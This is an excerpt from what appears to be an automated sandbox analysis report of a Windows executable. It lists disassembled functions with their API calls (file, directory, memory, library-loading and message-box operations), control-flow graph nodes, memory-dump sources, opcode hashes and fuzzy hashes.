                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90), ref: 00409A5C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,01FB0868), ref: 0040966C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: D
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3356880605-2746444292
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp$y@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp$y@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-2986845003
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 333 40778a-40778f 330->333 334 4077fd-407802 330->334 335 40783b-40783d 331->335 336 4077fb 331->336 338 407803-407819 333->338 340 407791-407792 333->340 334->338 339 407841-407843 335->339 336->334 341 40785b-40785c 338->341 349 40781b 338->349 339->341 342 407724-407741 340->342 343 407794-4077b4 340->343 345 4078d6-4078eb call 407890 InterlockedExchange 341->345 346 40785e-40788c 341->346 348 4077b5 342->348 350 407743 342->350 343->348 366 407912-407917 345->366 367 4078ed-407910 345->367 359 407820-407823 346->359 360 407890-407893 346->360 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->335 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->335 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2987862817-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FB03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FB03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
